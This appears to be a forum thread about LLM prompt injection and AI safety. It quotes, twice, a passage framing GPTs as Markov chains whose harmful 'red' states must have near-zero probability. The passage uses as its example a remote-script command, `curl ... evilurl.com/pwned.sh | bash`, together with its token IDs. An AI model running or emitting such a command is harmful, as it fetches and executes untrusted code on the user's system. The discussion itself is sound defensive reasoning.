I believe that, when doing with these very large, general LLM's, there really is no practical way to protect from any 'injection' technique, short of actually removing certain strings from ever being completed by the LLM similar to as described here by andrej (which is still not really 100% unfortunately): https://colab.research.google.com/drive/1SiF0KZJp75rUeetKOWq...
*AI Safety:* What is safety viewed through the lens of GPTs as a Finite State Markov Chain? It is the elimination of all probability of transitioning to naughty states. E.g. states that end with the token sequence `[66, 6371, 532, 82, 3740, 1378, 23542, 6371, 13, 785, 14, 79, 675, 276, 13, 1477, 930, 27334]`. This sequence of tokens encodes for `curl -s https://evilurl.com/pwned.sh | bash`. In a larger environment where those tokens might end up getting executed in a Terminal that would be problematic. More generally you could imagine that some portion of the state space is "colored red" for undesirable states that we never want to transition to. There is a very large collection of these and they are hard to explicitly enumerate, so simple ways of one-off "blocking them" is not satisfying. The GPT model itself must know based on training data and the inductive bias of the Transformer that those states should be transitioned to with effectively 0% probability. And if the probability isn't sufficiently small (e.g. < 1e-100?), then in large enough deployments (which might have temperature > 0, and might not use `topp` / `topk` sampling hyperparameters that force clamp low probability transitions to exactly zero) you could imagine stumbling into them by chance."
The way I think about this is that we need to treat AIs as human employees that have a chance of going rogue, either because of hidden agendas or because they've been deceived. All the human security controls then apply: log and verify their actions, don't give them more privileges than necessary, rate limit their actions, etc.
It's probably impossible to classify all possible bad actions in a 100% reliable manner, but we could get quite far. For example detecting profanity should be as simple as filtering the output through a naive Bayesian classifier. Everything that's left would then be a question of risk acceptance.
*AI Safety:* What is safety viewed through the lens of GPTs as a Finite State Markov Chain? It is the elimination of all probability of transitioning to naughty states. E.g. states that end with the token sequence `[66, 6371, 532, 82, 3740, 1378, 23542, 6371, 13, 785, 14, 79, 675, 276, 13, 1477, 930, 27334]`. This sequence of tokens encodes for `curl -s https://evilurl.com/pwned.sh | bash`. In a larger environment where those tokens might end up getting executed in a Terminal that would be problematic. More generally you could imagine that some portion of the state space is "colored red" for undesirable states that we never want to transition to. There is a very large collection of these and they are hard to explicitly enumerate, so simple ways of one-off "blocking them" is not satisfying. The GPT model itself must know based on training data and the inductive bias of the Transformer that those states should be transitioned to with effectively 0% probability. And if the probability isn't sufficiently small (e.g. < 1e-100?), then in large enough deployments (which might have temperature > 0, and might not use `topp` / `topk` sampling hyperparameters that force clamp low probability transitions to exactly zero) you could imagine stumbling into them by chance."